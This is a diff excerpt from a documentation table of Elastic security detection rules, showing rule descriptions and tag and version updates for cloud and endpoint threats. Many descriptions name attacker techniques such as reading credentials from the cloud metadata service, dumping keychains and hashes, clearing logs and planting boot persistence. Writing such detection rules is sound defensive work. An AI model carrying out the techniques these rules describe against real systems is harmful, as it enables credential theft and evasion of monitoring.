Manager (SSM) inventory APIs or running the AWS-GatherSoftwareInventory job. These APIs reveal detailed information about managed EC2 instances including installed software, patch compliance status, and command execution history. Adversaries may use these calls to collect software inventory while blending in with legitimate AWS operations. This is a New Terms rule that detects when a user accesses these reconnaissance APIs for the first time. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS SSM], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |3 +|<> |Detects the rare occurrence of a user or role accessing AWS Systems Manager (SSM) inventory APIs or running the AWS-GatherSoftwareInventory job. These APIs reveal detailed information about managed EC2 instances including installed software, patch compliance status, and command execution history. Adversaries may use these calls to collect software inventory while blending in with legitimate AWS operations. This is a New Terms rule that detects when a user accesses these reconnaissance APIs for the first time. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS SSM], [Tactic: Discovery], [Rule Type: New Terms], [Resources: Investigation Guide] |None |4 |<> |Identifies process start events where the parent process is the AWS Systems Manager (SSM) Session Manager worker. Session Manager provides interactive shell access to EC2 instances and hybrid nodes without bastion hosts or open inbound ports. Adversaries abuse it for remote execution and lateral movement using legitimate AWS credentials and IAM permissions. This rule surfaces endpoint execution occurring under that worker for visibility and hunting. Expect noise from authorized administrative sessions. |[Domain: Endpoint], [Domain: Cloud], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |3 @@ -382,7 +398,7 @@ and their rule type is `machine_learning`. |<> |Identifies when the STS AssumeRoot action is performed by a rare user in AWS. The AssumeRoot action allows users to assume the root member account role, granting elevated but specific permissions based on the task policy specified. Adversaries who have compromised user credentials can use this technique to escalate privileges and gain unauthorized access to AWS resources. This is a New Terms rule that identifies when the STS AssumeRoot action is performed by a user that rarely assumes this role against a specific member account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |None |9 -|<> |An adversary with access to a set of compromised credentials may attempt to verify that the credentials are valid and determine what account they are using. This rule looks for the first time an identity has called the STS GetCallerIdentity API, which may be an indicator of compromised credentials. A legitimate user would not need to perform this operation as they should know the account they are using. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Identity and Access Audit], [Tactic: Discovery], [Resources: Investigation Guide] |None |9 +|<> |An adversary with access to a set of compromised credentials may attempt to verify that the credentials are valid and determine what account they are using. This rule looks for the first time an identity has called the STS GetCallerIdentity API, which may be an indicator of compromised credentials. A legitimate user would not need to perform this operation as they should know the account they are using. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS STS], [Tactic: Discovery], [Rule Type: New Terms], [Resources: Investigation Guide] |None |10 |<> |Identifies successful calls to AWS STS GetFederationToken where request parameters reference AdministratorAccess. This API returns temporary security credentials for a federated user with permissions bounded by the calling IAM user and any inline session policy passed in the request. Supplying or referencing the AWS managed AdministratorAccess policy (or an equivalent string in the policy payload) can grant broadly privileged temporary credentials and may indicate privilege abuse or dangerous automation. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |1 @@ -410,15 +426,15 @@ and their rule type is `machine_learning`. |<> |Captures requests to the AWS federation endpoint (signin.amazonaws.com) for GetSigninToken. This API exchanges existing temporary AWS credentials (e.g., from STS GetFederationToken or AssumeRole) for a short-lived sign-in token that is embedded in a one-click URL to the AWS Management Console. It is commonly used by custom federation tools and automation to pivot from programmatic access to a browser session. This is a building block rule meant to be used for correlation with other rules to detect suspicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Sign-In], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Rule Type: BBR] |None |2 -|<> |Identifies successful AWS API calls where the CloudTrail user agent indicates offensive tooling or automated credential verification. This includes the AWS CLI or Boto3 reporting a Kali Linux distribution fingerprint (`distrib#kali`), and clients that identify as TruffleHog, which is commonly used to validate leaked secrets against live AWS APIs. These patterns are uncommon for routine production workloads and may indicate compromised credentials, unauthorized access, or security tooling operating outside approved scope. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |6 +|<> |Identifies successful AWS API calls where the CloudTrail user agent indicates offensive tooling or automated credential verification. This includes the AWS CLI or Boto3 reporting a Kali Linux distribution fingerprint (`distrib#kali`), and clients that identify as TruffleHog, which is commonly used to validate leaked secrets against live AWS APIs. These patterns are uncommon for routine production workloads and may indicate compromised credentials, unauthorized access, or security tooling operating outside approved scope. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |7 -|<> |Detects the first occurrence of a user identity accessing AWS Systems Manager (SSM) SecureString parameters using the GetParameter or GetParameters API actions with credentials in the request parameters. This could indicate that the user is accessing sensitive information. This rule detects when a user accesses a SecureString parameter with the withDecryption parameter set to true. This is a New Terms rule that detects the first occurrence of an AWS identity accessing SecureString parameters with decryption. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Systems Manager], [Tactic: Credential Access], [Resources: Investigation Guide] |None |9 +|<> |Detects the first occurrence of a user identity accessing AWS Systems Manager (SSM) SecureString parameters using the GetParameter or GetParameters API actions with credentials in the request parameters. This could indicate that the user is accessing sensitive information. This rule detects when a user accesses a SecureString parameter with the withDecryption parameter set to true. This is a New Terms rule that detects the first occurrence of an AWS identity accessing SecureString parameters with decryption. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS SSM], [Tactic: Credential Access], [Rule Type: New Terms], [Resources: Investigation Guide] |None |10 -|<> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |213 +|<> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |214 -|<> |Identifies the deletion of an AWS Web Application Firewall (WAF) Web ACL. Web ACLs are the core enforcement objects in AWS WAF, defining which traffic is inspected, allowed, or blocked for protected applications. Deleting a Web ACL removes all associated rules, protections, and logging configurations. Adversaries who obtain sufficient privileges may delete a Web ACL to disable critical security controls, evade detection, or prepare for downstream attacks such as web-application compromise, data theft, or resource abuse. Because Web ACLs are rarely deleted outside of controlled maintenance or infrastructure updates, unexpected deletions may indicate potential defense evasion. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS WAF], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |212 +|<> |Identifies the deletion of an AWS Web Application Firewall (WAF) Web ACL. Web ACLs are the core enforcement objects in AWS WAF, defining which traffic is inspected, allowed, or blocked for protected applications. Deleting a Web ACL removes all associated rules, protections, and logging configurations. Adversaries who obtain sufficient privileges may delete a Web ACL to disable critical security controls, evade detection, or prepare for downstream attacks such as web-application compromise, data theft, or resource abuse. Because Web ACLs are rarely deleted outside of controlled maintenance or infrastructure updates, unexpected deletions may indicate potential defense evasion. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS WAF], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 -|<> |Identifies the deletion of an AWS Web Application Firewall (WAF) rule or rule group. WAF rules and rule groups enforce critical protections for web applications by filtering malicious HTTP requests, blocking known attack patterns, and enforcing access controls. Deleting these rules—even briefly—can expose applications to SQL injection, cross-site scripting, credential-stuffing bots, or targeted exploitation. Adversaries who have gained sufficient permissions may remove WAF protections as part of a broader defense evasion or impact strategy, often preceding data theft or direct application compromise. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS WAF], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |212 +|<> |Identifies the deletion of an AWS Web Application Firewall (WAF) rule or rule group. WAF rules and rule groups enforce critical protections for web applications by filtering malicious HTTP requests, blocking known attack patterns, and enforcing access controls. Deleting these rules—even briefly—can expose applications to SQL injection, cross-site scripting, credential-stuffing bots, or targeted exploitation. Adversaries who have gained sufficient permissions may remove WAF protections as part of a broader defense evasion or impact strategy, often preceding data theft or direct application compromise. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS WAF], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 |<> |Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame] |None |219 @@ -642,7 +658,7 @@ and their rule type is `machine_learning`. |<> |Detects when Azure OpenAI requests result in zero response length, potentially indicating issues in output handling that might lead to security exploits such as data leaks or code execution. This can occur in cases where the API fails to handle outputs correctly under certain input conditions. |[Domain: LLM], [Data Source: Azure OpenAI], [Data Source: Azure Event Hubs], [Use Case: Insecure Output Handling], [Resources: Investigation Guide] |None |6 -|<> |Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |3 +|<> |Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Activity Logs], [Platform: Azure], [Rule Type: Custom Query (KQL)], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |4 |<> |Identifies the deletion of Azure Recovery Services resources. Azure Recovery Services vaults contain data for copies of VMs, workloads, servers, and other resources regarding Infrastructure as a Service (IaaS). Adversaries may delete these recovery services to impact backup capabilities during stable operations or to inhibit disaster recovery services during ransom-based attacks or operational disruptions. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Rule Type: BBR] |None |1 @@ -708,6 +724,8 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |116 +|<> |This rule detects the creation of a binfmt configuration file. Binfmt is a utility that is used to configure the behavior of the Linux kernel when executing binary files. By creating a malicious binfmt configuration file, threat actors can execute a backdoor script or command on the target system. |[Domain: Endpoint], [OS: Linux], [Platform: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism. Adversaries may abuse BITS to persist, download, execute, and even clean up after running malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Sysmon], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |108 |<> |This rule detects the process of copying or moving files from or to the "/boot" directory on Linux systems. The "/boot" directory contains files that are essential for the system to boot, such as the kernel and initramfs images. Attackers may copy or move files to the "/boot" directory to modify the boot process, which can be leveraged to maintain access to the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |5 @@ -724,13 +742,15 @@ and their rule type is `machine_learning`. |<> |Detects chroot execution on Linux when the process appears to run in a container-oriented context: the process title matches runc init, the entry leader is a container workload, or the parent process is runc. Chroot from inside a container can pivot to an alternate root filesystem and is a common step in container breakout attempts when combined with sensitive host mounts. |[Data Source: Auditd Manager], [Data Source: Elastic Defend], [Domain: Container], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |2 +|<> |Detects unexpected modification of Claude Desktop Cowork VM boot images (kernel, initrd, root filesystem). Adversaries with user-context access can rewrite these stored images so later Cowork sessions boot attacker-controlled code inside a virtual instance that host EDR cannot inspect by default. |[Domain: Endpoint], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |1 + |<> |Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |320 |<> |Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |322 |<> |Detects HTTP GET requests to the link-local instance metadata service (169.254.169.254) for cloud credential or token paths on AWS, GCP, or Azure. Adversaries and vulnerable workloads use scripts, shells, or application runtimes to read IAM role credentials or OAuth tokens from the metadata API. Requires the Network Packet Capture integration with HTTP decoding on ports 80 and 443 and process enrichment enabled so "process.*" fields are present. |[Domain: Cloud], [Domain: Network], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Network Packet Capture], [Resources: Investigation Guide] |None |1 -|<> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Resources: Investigation Guide] |None |111 +|<> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint], [Rule Type: ESQL], [Data Source: Fortinet], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |112 |<> |Identifies attempts to disable/modify the code signing policy through system native utilities. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |216 @@ -850,14 +870,8 @@ and their rule type is `machine_learning`. |<> |Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |316 -|<> |Detects writing executable files that will be automatically launched by Adobe on launch. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike] |None |421 - -|<> |Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |419 - |<> |Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |214 -|<> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Resources: Investigation Guide] |None |213 - |<> |Identifies when Microsoft Cloud App Security flags potential ransomware activity in Microsoft 365. This rule detects events where the Security Compliance Center reports a "Ransomware activity" or "Potential ransomware activity" alert, which may indicate file encryption, mass file modifications, or uploads of ransomware-infected files to cloud services such as SharePoint or OneDrive. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |215 |<> |Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |213 @@ -868,20 +882,12 @@ and their rule type is `machine_learning`. |<> |Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |214 -|<> |Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization’s security controls. |[Domain: Cloud], [Data Source: Google Workspace], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |212 - |<> |Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: PowerShell Logs], [Rule Type: BBR] |None |110 -|<> |Identifies scripts that contain patterns and known methods that obfuscate PowerShell code. Attackers can use obfuscation techniques to bypass PowerShell security protections such as Antimalware Scan Interface (AMSI). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |110 - |<> |Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Discovery], [Data Source: PowerShell Logs], [Rule Type: BBR] |None |215 |<> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Execution], [Data Source: PowerShell Logs], [Rule Type: BBR] |None |213 -|<> |The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |112 - -|<> |Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |323 - |<> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id and user.id entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule], [Rule Type: BBR] |None |3 |<> |Identifies successful outbound TLS sessions that negotiate deprecated protocol versions (SSLv3, TLS 1.0, or TLS 1.1) or weak cipher suites such as RC4, 3DES, NULL, EXPORT, or anonymous Diffie-Hellman. Adversaries-in-the-middle and legacy malware often force these negotiations to decrypt or intercept traffic. Modern clients and services should negotiate TLS 1.2 or 1.3 with strong ciphers on internet-bound connections. |[Domain: Network], [Use Case: Network Security Monitoring], [Use Case: Threat Detection], [Data Source: Network Traffic], [Tactic: Credential Access], [Tactic: Command and Control], [Resources: Investigation Guide] |None |1 @@ -920,7 +926,7 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of Dracut module files on Linux systems. Dracut is a tool used to generate an initramfs image that is used to boot the system. Dracut modules are scripts that are executed during the initramfs image generation process. Attackers may create malicious Dracut modules to execute arbitrary code at boot time, which can be leveraged to maintain persistence on a Linux system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |6 -|<> |Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 +|<> |Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 |<> |Adversaries may dump the content of the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 @@ -944,9 +950,9 @@ and their rule type is `machine_learning`. |<> |This rule identifies a sequence of events where a process named "entrypoint.sh" is started in a container, followed by a network connection attempt. This sequence indicates a potential egress connection from an entrypoint in a container. An entrypoint is a command or script specified in the Dockerfile and executed when the container starts. Attackers can use this technique to establish a foothold in the environment, escape from a container to the host, or establish persistence. |[Domain: Endpoint], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 -|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |114 +|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |115 -|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |3 +|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |4 |<> |This rule correlates any Elastic Defend alert with an email security related alert by target user name. This may indicate the successful execution of a phishing attack. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Check Point Harmony Email & Collaboration], [Domain: Email], [Domain: Endpoint] |None |4 @@ -1044,7 +1050,7 @@ and their rule type is `machine_learning`. |<> |Identifies potential session hijacking or token replay in Microsoft Entra ID. This rule detects cases where a user signs in and subsequently accesses Microsoft Graph from a different IP address using the same session ID. This may indicate a successful OAuth phishing attack, session hijacking, or token replay attack, where an adversary has stolen a session cookie or refresh/access token and is impersonating the user from an alternate host or location. |[Domain: Cloud], [Domain: Identity], [Domain: API], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion], [Tactic: Initial Access] |None |11 -|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Initial Access], [Resources: Investigation Guide] |None |5 +|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Platform: Entra ID], [Tactic: Initial Access], [Tactic: Defense Evasion], [Rule Type: New Terms], [Resources: Investigation Guide] |None |6 |<> |Identifies the first occurrence of a Microsoft Entra ID device, surfaced through the Entra ID Entity Analytics device inventory, whose host name follows the default "DESKTOP-" pattern and whose operating system build is "10.0.19045.2006". This is the frozen default device profile observed when adversary-in-the-middle (AiTM) phishing kits such as Tycoon2FA and Kali365 register Azure AD-joined devices after capturing a victim session, in order to acquire a Primary Refresh Token (PRT) and establish persistence. The build is hardcoded by the tooling and differs from legitimate hosts: a patched Windows 10 22H2 device reports a far higher "10.0.19045." value, so a device frozen at ".2006" with a default name is a high-fidelity, though evadable, indicator. |[Domain: Cloud], [Domain: Identity], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Entity Analytics], [Use Case: Asset Visibility], [Use Case: Threat Detection], [Threat: Tycoon2FA], [Threat: Kali365], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 @@ -1078,7 +1084,7 @@ and their rule type is `machine_learning`. |<> 